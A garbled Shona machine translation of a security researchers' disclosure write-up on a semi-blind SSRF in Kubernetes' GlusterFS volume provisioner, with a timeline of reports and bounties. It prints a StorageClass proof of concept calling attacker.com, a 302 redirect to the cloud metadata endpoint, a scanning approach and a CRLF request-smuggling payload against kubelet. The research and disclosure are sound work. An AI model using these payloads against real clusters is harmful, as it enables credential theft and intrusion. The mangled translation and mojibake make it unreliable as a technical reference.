Cherechedza. transl.: vanyori vechinyorwa chino vanotaura zvakadzama nezve mawaniro avakaita kuti vaone kusagadzikana in Kubernetes. Kunyangwe pakutanga zvaisaita kunge zvine ngozi, mukubatana nezvimwe zvinhu kutsoropodza kwacho kwakave kwakanyanya kune vamwe vanopa makore. Masangano akati wandei akapa mubayiro nyanzvi pabasa radzo.
Tiri vanaani
Isu tiri vaviri vekuFrance vaongorori vekuchengetedza vakawana pamwe chete kusazvibata muKubernetes. Mazita edu ndiBrice Augras naChristophe Hauquiert, asi pamapuratifomu mazhinji eBug Bounty isu tinozivikanwa seReeverzax naHach zvakateerana:
- - ;
- -Kubernetes mugadziri kuNokia.
Chii chaitika?
Ichi chinyorwa inzira yedu yekugovera maitirwo akajairwa purojekiti yekutsvagisa zvisingatarisirwi yakashanduka kuita inonakidza kwazvo muhupenyu hwevanovhima bug (zvirinani izvozvi).
Sezvaungangoziva iwe, vavhimi vebug vane akati wandei anoonekwa maficha:
- vanorarama nepizza nedoro;
- vanoshanda apo vamwe vose vakarara.
Isu hatina mutsauko kumitemo iyi: tinowanzo kusangana pakupera kwevhiki uye tinopedza husiku hwekusarara tichibira. Asi humwe hwousiku uhwu hwakaguma nenzira yechienzi zvikuru.
Pakutanga taizosangana kuti tikurukure kutora chikamu mu zuva raitevera. Munguva yekukurukurirana nezve Kubernetes chengetedzo munzvimbo inochengetedzwa yebasa, takarangarira zano rekare reSSRF () uye akasarudza kuedza kuishandisa se script yekurwisa.
11 pm takagara pasi kuti tiite tsvagiridzo yedu uye takarara mangwanani-ngwanani, takagutsikana kwazvo nemhedzisiro. Yakanga iri nekuda kwekutsvagisa uku kwatakasangana neMSRC Bug Bounty chirongwa uye tikauya neropafadzo yekuwedzera mukana.
Kwakapera mavhiki/mwedzi yakati wandei, uye mhedzisiro yedu isingatarisirwe yakakonzera mumwe wemibairo yepamusoro munhoroondo yeAzure Cloud Bug Bounty - kuwedzera kune yatakagamuchira kubva Kubernetes!
Zvichienderana nepurojekiti yedu yekutsvagisa, Kubernetes Product Security Committee yakaburitswa .
Zvino ini ndoda kuparadzira ruzivo nezve yakawanikwa njodzi zvakanyanya sezvinobvira. Isu tinovimba unokoshesa kuwana uye kugovera ruzivo rwehunyanzvi nedzimwe nhengo dze infosec nharaunda!
Saka heino nyaya yedu...
Pfungwa
Kuti tinzwisise zvakanyanya zvakaitika, ngatitangei kutarisa kuti Kubernetes anoshanda sei munzvimbo inochengetedzwa gore.
Paunosimbisa Kubernetes cluster munzvimbo yakadai, iyo manejimendi layer rinowanzo ibasa remupi wegore:
Iyo yekudzora layer iri panzvimbo yemupi wegore, nepo Kubernetes node dziri panzvimbo yemutengi.
Kugovera zvine simba mavhoriyamu, dhizaini rinoshandiswa kuapa zvine simba kubva kune yekunze yekuchengetedza kumashure uye nekuaenzanisa nePVC (inoenderera vhoriyamu kudai, i.e. kukumbira vhoriyamu).
Saka, mushure mekunge PVC yagadzirwa uye yakasungwa kuStorageClass muK8s cluster, zvimwe zviito zvekupa vhoriyamu zvinotorwa nekube/cloud controller maneja (zita rayo chairo rinoenderana nekuburitswa). (Cherechedza. transl.: Isu takatonyora zvakawanda nezveCCM tichishandisa muenzaniso wekuitwa kwayo kune mumwe wevanopa makore .)
Kune akati wandei marudzi evanopa anotsigirwa naKubernetes: mazhinji acho anosanganisirwa mukati , nepo mamwe achitariswa neamwewo marongero anoiswa mumapods musumbu.
Mutsvagiridzo yedu, takatarisa pane yemukati mavhoriyamu ekupa maitiro, ayo anoratidzwa pazasi:
Dynamic kupa mavhoriyamu uchishandisa yakavakirwa-mukati Kubernetes provider
Muchidimbu, Kubernetes painoiswa munzvimbo inochengetedzwa, maneja maneja ibasa remupi wegore, asi chikumbiro chekugadzira vhoriyamu (nhamba 3 padhayagiramu iri pamusoro) chinosiya network yemukati memupi wegore. Uye apa ndipo apo zvinhu zvinonyanya kunakidza!
Hacking scenario
Muchikamu chino, tichatsanangura matorero atakaita mukana wekufambiswa kwebasa kwataurwa pamusoro uye nekuwana zviwanikwa zvemukati zvemupi webasa wegore. Ichakuratidzawo maitiro aungaita zvimwe zviito, sekuwana zvitupa zvemukati kana ropafadzo dziri kuwedzera.
Kumwe kunyengedza kwakapusa (munyaya iyi, Service Side Chikumbiro Forgery) yakabatsira kuenda kupfuura nharaunda yevatengi kuita masumbu evanopa masevhisi akasiyana pasi peK8s.
Mukutsvaga kwedu takatarisa kune GlusterFS provider. Kunyangwe chokwadi chekuti kutevedzana kwezviito kunotsanangurwa muchirevo chechinyorwa chino, Quobyte, StorageOS uye ScaleIO vanobatwa nekusagadzikana kwakafanana.
Kusashandiswa zvakanaka kwesimba rekupa mavhoriyamu
Panguva yekuchengetedza kirasi yekuongorora GlusterFS muGolang client source code isu kuti pachikumbiro chekutanga cheHTTP (3) chakatumirwa panguva yekugadzira vhoriyamu, kusvika kumagumo eiyo tsika URL muparameter resturl akawedzera /volumes.
Takasarudza kubvisa iyi nzira yekuwedzera nekuwedzera # mune parameter resturl. Heino yekutanga YAML kumisikidzwa yataishandisa kuyedza semi-bofu SSRF kusagadzikana. (iwe unogona kuverenga zvakawanda nezve semi-bofu kana hafu-mapofu SSRF, semuenzaniso, - approx. transl.):
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: poc-ssrf
spec:
accessModes:
- ReadWriteOnce
volumeMode: Filesystem
resources:
requests:
storage: 8Gi
storageClassName: poc-ssrfIpapo isu takashandisa iyo binary kubata kure kure Kubernetes cluster kubectl. Kazhinji, vanopa makore (Azure, Google, AWS, nezvimwewo) vanokutendera kuti uwane zvitupa zvekushandisa mune iyi yekushandisa.
Nekuda kweizvi, ndakakwanisa kushandisa yangu "special" faira. Kube-controller-maneja aita HTTP chikumbiro:
kubectl create -f sc-poc.yaml
Mhinduro kubva pakuona kweanorwisa
Nguva pfupi yapfuura izvi, isu takakwanisawo kugamuchira mhinduro yeHTTP kubva kune yakananga server - kuburikidza nemirairo describe pvc kana get events mu kubectl. Uye zvechokwadi: iyi yekusarudzika Kubernetes mutyairi ane verbose mune yayo yambiro / mhosho meseji ...
Heino muenzaniso une link kune https://www.google.frseta separameter resturl:
kubectl describe pvc poc-ssrf
# ΠΈΠ»ΠΈ ΠΆΠ΅ ΠΌΠΎΠΆΠ΅ΡΠ΅ Π²ΠΎΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΡΡΡ kubectl get events
Mukuita uku, takaganhurirwa kumibvunzo yakadai HTTP POST uye haana kukwanisa kuwana zviri mukati meboka rekupindura kana kodhi yekudzoka yaive 201. Naizvozvo, takasarudza kuita imwe tsvakiridzo uye nekuwedzera iyi yekubira mamiriro nemaitiro matsva.
Iko kushanduka kwekutsvaga kwedu
- Advanced Scenario #1: Kushandisa 302 redirect kubva kune yekunze server kushandura nzira yeHTTP kuti ipe nzira inoshanduka yekuunganidza data yemukati.
- Yepamberi Scenario #2: Otomatiki LAN scanning uye yemukati zviwanikwa kuwanikwa.
- Yepamberi mamiriro #3: kushandisa HTTP CRLF + kuverevedza ("chikumbiro kuverevedza") kugadzira zvakagadzirirwa HTTP zvikumbiro uye kudzoreredza data rakatorwa kubva kube-controller matanda.
Zvidimbu zvehunyanzvi
- Tsvagiridzo yakashandisa Azure Kubernetes Service (AKS) ine Kubernetes vhezheni 1.12 mudunhu reNorth Europe.
- Mamiriro ezvinhu atsanangurwa pamusoro akaitwa pane zvichangoburwa zveKubernetes, kunze kweyechitatu mamiriro, nekuti. aida Kubernetes yakavakwa neGolang vhezheni β€ 1.12.
- Attacker's ekunze server -
https://attacker.com.
Yepamberi Mamiriro #1: Kutungamira zvakare chikumbiro cheHTTP POST kuGET uye kugamuchira data rakadzama
Nzira yepakutanga yakagadziridzwa nekugadziriswa kwevarwisa server kuti idzoke 302 HTTP Retcodekushandura chikumbiro chePOST kuchikumbiro cheGET (nhanho 4 mudhayagiramu):
Chikumbiro chekutanga (3) chinouya kubva kumutengi GlusterFS (Mutongi Maneja), ane POST mhando. Nekutevera matanho aya takakwanisa kuishandura kuita GET:
- Separameter
resturlmuStorageClass inoratidzwahttp://attacker.com/redirect.php. - Endpoint
https://attacker.com/redirect.phpinopindura ne302 HTTP mamiriro kodhi ine inotevera Nzvimbo Header:http://169.254.169.254. Izvi zvinogona kuve chero imwe yemukati sosi - mune iyi kesi, redirect link inoshandiswa chete semuenzaniso. - kubudikidza default net/http raibhurari Golang anodzosa chikumbiro uye anoshandura iyo POST kuenda kuGET ine 302 mamiriro kodhi, zvichikonzera chikumbiro cheHTTP GET kune yainotarirwa sosi.
Kuti uverenge iyo HTTP mhinduro muviri unofanirwa kuita describe PVC chinhu:
kubectl describe pvc xxxHeino muenzaniso wemhinduro yeHTTP muJSON fomati yatakakwanisa kugamuchira:
Izvo zvinogoneka zvekusagadzikana zvakawanikwa panguva iyoyo zvaive zvishoma nekuda kweanotevera mapoinzi:
- Kutadza kuisa misoro yeHTTP muchikumbiro chiri kubuda.
- Kusakwanisa kuita chikumbiro chePOST nema parameters mumuviri (izvi zviri nyore kukumbira kukosha kwakakosha kubva kune etcd muenzaniso uchienderera mberi. 2379 chiteshi kana HTTP isina kunyorwa ikashandiswa).
- Kusakwanisa kudzoreredza zvirimo mumutumbi wemhinduro apo iyo kodhi yenzvimbo yaive mazana maviri uye mhinduro yacho yakanga isina JSON Content-Type.
Yepamberi mamiriro #2: Kutarisa network yemuno
Iyi hafu-bofu yeSSRF nzira yakazoshandiswa kuongorora network yemukati memupi wegore uye kuvhota akasiyana masevhisi ekuteerera (Metadata muenzaniso, Kubelet, etcd, zvichingodaro) zvichienderana nemhinduro. kube controller.
Chekutanga, madoko ekuteerera akajairwa ezvikamu zveKubernetes akatemerwa (8443, 10250, 10251, zvichingodaro), uye taifanira kuita otomatiki maitiro ekuongorora.
Tichiona kuti iyi nzira yekuongorora zviwanikwa yakanyatsojeka uye haienderane neyekare scanner uye SSRF maturusi, isu takafunga kugadzira vashandi vedu mune bash script inogadzirisa maitiro ese.
Semuenzaniso, kuitira kukurumidza kuongorora huwandu 172.16.0.0/12 yemukati network, vashandi gumi nevashanu vakatangwa zvakafanana. Iyo iri pamusoro IP renji yakasarudzwa semuenzaniso chete uye inogona kunge iri pasi pekuchinja kune yako chaiyo inopa sevhisi IP renji.
Kuti utarise imwe kero yeIP uye imwe chiteshi, unofanirwa kuita zvinotevera:
- bvisa yekupedzisira yakaongororwa StorageClass;
- bvisa iyo yapfuura yakasimbiswa Persistent Volume Claim;
- shandura iyo IP uye Port kukosha mukati
sc.yaml; - gadzira StorageClass ine IP itsva uye chiteshi;
- gadzira PVC itsva;
- bvisa scanner mhinduro uchishandisa tsanangura yePVC.
Yepamberi mamiriro #3: CRLF jekiseni + kuverevedza HTTP mune "yekare" shanduro dzeKubernetes cluster.
Kana nekuwedzera kune izvi mupi akapa vatengi shanduro dzekare dzeK8s cluster ΠΈ yakavapa mukana kune kube-controller-maneja matanda, mhedzisiro yacho yakatonyanya kukosha.
Chokwadi zviri nyore kuti munhu anorwisa achinje zvikumbiro zveHTTP zvakagadzirirwa kuwana mhinduro yakazara yeHTTP pakufunga kwake.
Kuti uite chiitiko chekupedzisira, zvinotevera zvinofanirwa kuzadzikiswa:
- Mushandisi anofanira kuwana kube-controller-maneja matanda (se, semuenzaniso, muAzure LogInsights).
- Iyo Kubernetes cluster inofanirwa kushandisa shanduro yeGolang yakaderera pane 1.12.
Isu takatumira nharaunda yemuno yakateedzera kutaurirana pakati peGlusterFS Go mutengi uye fake target server (ticharamba kuburitsa PoC izvozvi).
Yakawanikwa , inokanganisa shanduro dzeGolang dzakaderera pane 1.12 uye kubvumira matsotsi kuita HTTP smuggling/CRLF kurwisa.
Nekubatanidza iyo hafu-bofu SSRF inotsanangurwa pamusoro Π²ΠΌΠ΅ΡΡΠ΅ neizvi, takakwanisa kutumira zvikumbiro kune zvatinoda, kusanganisira kutsiva misoro, nzira yeHTTP, paramita uye data, iyo kube-controller-maneja yakazogadziriswa.
Heino muenzaniso we "bait" inoshanda mune parameter resturl StorageClass, iyo inoshandisa yakafanana kurwisa mamiriro:
http://172.31.X.1:10255/healthz? HTTP/1.1rnConnection: keep-
alivernHost: 172.31.X.1:10255rnContent-Length: 1rnrn1rnGET /pods? HTTP/1.1rnHost: 172.31.X.1:10255rnrnMhedzisiro ndeye kukanganisa mhinduro isina kukumbirwa, meseji pamusoro payo yakanyorwa mumarogi emutongi. Kutenda kune verbosity inogoneswa neiyo default, zviri mukati meHTTP mhinduro meseji zvinochengetwa ipapo.
Ichi chaive "chirauro" chedu chakanyanya kushanda mukati mehurongwa hwehumbowo hwepfungwa.
Tichishandisa nzira iyi, takakwanisa kuita kumwe kurwiswa kunotevera kumasumbu evanopa vakasiyana-siyana vakagadziriswa k8s: ropafadzo kukwira nezvitupa pane metadata zviitiko, Master DoS kuburikidza (isina kunyorwa) HTTP zvikumbiro pane etcd master zviitiko, nezvimwe.
Migumisiro
MuKubernetes chirevo chepamutemo chine chekuita nekusagadzikana kweSSRF kwatakawana, yakayerwa CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. Kana tikangofunga nezvekusagadzikana kwakabatana neKubernetes perimeter, iyo yekutendeseka vector (kutendeseka vector) inokodzera se hapana.
Nekudaro, kuongorora mhedzisiro inogona kuitika mumamiriro enzvimbo inotungamirwa yebasa (uye ichi ndicho chaive chikamu chinonakidza chetsvagiridzo yedu!) Yakakosha CVSS10/10 kune vakawanda vanogovera.
Pazasi pane rumwe ruzivo rwekukubatsira kuti unzwisise zvatinofunga kana uchiongorora zvinogona kuitika munzvimbo dzemakore:
Kuperera
- Ita mirairo uri kure uchishandisa zvakawanikwa zvemukati zvitupa.
- Kugadzirazve mamiriro ari pamusoro uchishandisa IDOR (Insecure Direct Object Reference) nzira nezvimwe zviwanikwa zvinowanikwa panetiweki yemuno.
Kuvanzika
- Attack type nekuda kwekubiwa kwezvitupa zvegore (semuenzaniso, metadata API).
- Kuunganidza ruzivo nekutarisa network yemuno (kusarudza iyo SSH vhezheni, HTTP server vhezheni, ...).
- Unganidza chiitiko uye ruzivo rwezvivakwa nekuvhota mukati maAPI akadai semetadata API (
http://169.254.169.254,β¦). - Kuba data revatengi uchishandisa cloud credentials.
Kuwanika
Zvese zvinoshandisa zviitiko zvine chekuita nekurwisa mavector pa kuvimbika, inogona kushandiswa kuita zvinoparadza uye inotungamira kune master zviitiko kubva kune mutengi perimeter (kana chero imwe) isingawanikwe.
Sezvo isu taive munzvimbo inotungamirwa yeK8s uye tichiongorora maitiro ekuvimbika, tinogona kufungidzira mamiriro mazhinji anogona kukanganisa kuwanikwa. Mimwe mienzaniso inosanganisira kukanganisa iyo etcd dhatabhesi kana kuita yakakosha kufona kuKubernetes API.
Chronology
- Zvita 6, 2019: Kusagadzikana kwakashumwa kune MSRC Bug Bounty.
- Ndira 3, 2020: Wechitatu akazivisa vagadziri veKubernetes kuti isu tiri kushanda nenyaya yekuchengetedza. Uye ndakavabvunza kuti vatarise SSRF seyemukati (mu-musimboti) kusagadzikana. Takazopa general report ine technical details nezvekwakabva dambudziko.
- Ndira 15, 2020: Takapa tekinoroji uye zvakajairika mishumo kuvagadziri veKubernetes pachikumbiro chavo (kuburikidza neHackerOne chikuva).
- Ndira 15, 2020: Vagadziri veKubernetes vakatizivisa kuti hafu-bofu SSRF + CRLF jekiseni rekuburitswa kwakapfuura inoonekwa sekusagadzikana kwemukati. Isu takabva tangomira kuongorora maperimeter evamwe vanopa masevhisi: timu yeK8s yaive zvino ichibata nechikonzero.
- Ndira 15, 2020: MSRC mubairo wakagamuchirwa kuburikidza neHackerOne.
- Ndira 16, 2020: Kubernetes PSC (Chigadzirwa Chekuchengetedza Komiti) yakaziva kusagadzikana uye ndokukumbira kuichengeta kusvika pakati paKurume nekuda kwehuwandu hukuru hwevangangobatwa.
- Kukadzi 11, 2020: Google VRP mubairo wakagamuchirwa.
- Kurume 4, 2020: Kubernetes mubairo wakagamuchirwa kuburikidza neHackerOne.
- Kurume 15, 2020: Kuburitswa pachena kwakarongwa kweveruzhinji kwakamiswa nekuda kweCOVID-19 mamiriro.
- Chikumi 1, 2020: Kubernetes + Microsoft yakabatana chirevo pamusoro pekusagadzikana.
TL; DR
- Tinonwa doro uye tinodya pizza :)
- Isu takaona kusagadzikana kwemukati muKubernetes, kunyangwe isu takanga tisina chinangwa chekudaro.
- Takaita ongororo yakawedzerwa pamasumbu evanopa makore akasiyana uye takakwanisa kuwedzera kukuvadzwa kwakakonzerwa nekusagadzikana kugamuchira mamwe mabhonasi anotyisa.
- Iwe uchawana akawanda ehunyanzvi ruzivo mune ino chinyorwa. Tingafara kukurukura navo newe (Twitter: & ).
- Zvakazoitika kuti marudzi ese emaitiro uye kushuma zvakatora nguva yakareba kupfuura yaitarisirwa.
nezvakanyorwa
- ;
- ;
- ;
- .
PS kubva kumushanduri
Verenga zvakare pablog yedu:
- Β«";
- Β«";
- Β«".
Source: www.habr.com